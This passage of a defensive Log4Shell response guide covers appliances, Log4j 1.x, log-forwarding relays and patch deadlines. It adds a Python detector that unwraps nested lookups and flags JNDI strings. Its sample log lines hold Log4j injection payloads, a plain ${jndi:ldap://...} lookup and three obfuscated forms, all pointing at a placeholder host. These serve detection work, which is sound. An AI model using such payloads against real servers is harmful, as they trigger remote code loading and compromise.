- Appliances: don't forget appliances and other opaque or third-party systems that may embed Java server components. Un-credentialed vulnerability scanning or simple exploitation tests will not reliably detect them; inventory them by asking vendors and inspecting the software bill of materials where one exists.
- Log4j 1.x: finding 1.x is not good news either. Log4j 1.x went end-of-life in August 2015 and receives no fixes.
- Log forwarding: logging infrastructure usually has many "northbound" (send my logs to someone) and "southbound" (receive logs from someone) forwarding/relaying topologies. For those not familiar, these are terms of art in the NMS (Network Monitoring/Management Systems) and logging space. A lookup string logged on one hop is re-logged on every hop it is forwarded to, so chaining these relays together for exploitation must also be considered: a collector, SIEM or archive that runs a vulnerable log4j can be hit by a payload that was harmless on the system that first recorded it.
- Cloud: multiple large providers are also affected, but this guide focuses mostly on the customer-managed side.
- Deadlines: CISA ordered federal agencies to patch Log4Shell by December 24th.
- Severity, in the words of one practitioner: "What people seem to miss: hearing folks compare #log4shell is 'as bad as heartbleed' - imo it's much, much worse. Aside from having RCE as the impact, the number of interdependencies around log4j (and particularly the age of them) is orders of magnitude higher."
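Because a lookup string survives every forwarding hop, the place to hunt for it is wherever logs land, not only the first system that wrote them. The following is an added example, not part of the original guide: a small Python detector that approximates how Log4j 2 resolves nested `${...}` lookups (the `${lower:…}`, `${upper:…}` and `${name:-default}` forms that were used to disguise `jndi:` in the wild) and flags any line that contains `jndi:` after normalisation. The log lines are constructed for the example, use the reserved `example.invalid` host, and are not real captures. The resolver is a detection heuristic only; it does not reproduce Log4j's full `StrSubstitutor`, so a lookup it does not understand is left as-is, and such lines deserve a manual look.

```python
import re
from typing import List

# Constructed sample log lines (not real captures). The first is benign; the
# others carry a plain JNDI lookup and three common obfuscations of it.
SAMPLE_LOGS: List[str] = [
    '10.0.0.5 - - "GET /index.html" 200 "Mozilla/5.0"',
    '10.0.0.6 - - "GET /" 200 "${jndi:ldap://example.invalid/a}"',
    '10.0.0.7 - - "GET /" 200 "${${lower:j}ndi:${lower:l}dap://example.invalid/a}"',
    '10.0.0.8 - - "GET /" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://example.invalid/a}"',
    '10.0.0.9 - - "GET /" 200 "${${env:NOPE:-j}ndi:dns://example.invalid/a}"',
]

# Matches an innermost ${...} lookup, i.e. one whose body contains no further
# '$', '{' or '}'. Resolving innermost-first mirrors Log4j's evaluation order.
INNERMOST_LOOKUP = re.compile(r'\$\{([^${}]*)\}')


def resolve_innermost(token: str) -> str:
    """Resolve one innermost lookup body the way a detector needs to.

    - ${lower:X} / ${upper:X}   -> case-mangled X
    - ${name:-default}, ${::-X} -> the default value (the attacker-controlled part)
    - anything else (e.g. "jndi:ldap://...") -> returned unchanged so the
      final jndi: check can see it.
    """
    prefix, sep, rest = token.partition(':')
    if not sep:
        return token
    if prefix.lower() == 'lower':
        return rest.lower()
    if prefix.lower() == 'upper':
        return rest.upper()
    if ':-' in token:
        # Covers ${env:NOPE:-j}, ${sys:x:-j} and the bare ${::-j} trick.
        return token.split(':-', 1)[1]
    return token


def normalize(line: str, max_rounds: int = 20) -> str:
    """Repeatedly collapse innermost lookups until the text stops changing.

    max_rounds bounds the work on hostile input with deep nesting.
    """
    for _ in range(max_rounds):
        expanded = INNERMOST_LOOKUP.sub(lambda m: resolve_innermost(m.group(1)), line)
        if expanded == line:
            break
        line = expanded
    return line


def is_suspicious(line: str) -> bool:
    """True if the line contains a JNDI lookup after de-obfuscation.

    Log4j matches the 'jndi' prefix case-insensitively, so lower-case first.
    """
    return 'jndi:' in normalize(line).lower()


def scan(lines: List[str]) -> List[str]:
    """Return the lines that should be escalated for review."""
    return [line for line in lines if is_suspicious(line)]


if __name__ == '__main__':
    for hit in scan(SAMPLE_LOGS):
        print('SUSPICIOUS:', hit)
        print('  resolves to:', normalize(hit))
```

Run it against each collector or relay in the chain, not just the edge, since the same line is present at every hop. Lookups the resolver does not model (for example `${date:…}` used as a filler) pass through unresolved, so a rule that also alerts on any residual `${` in a field that should never contain one is a sensible companion.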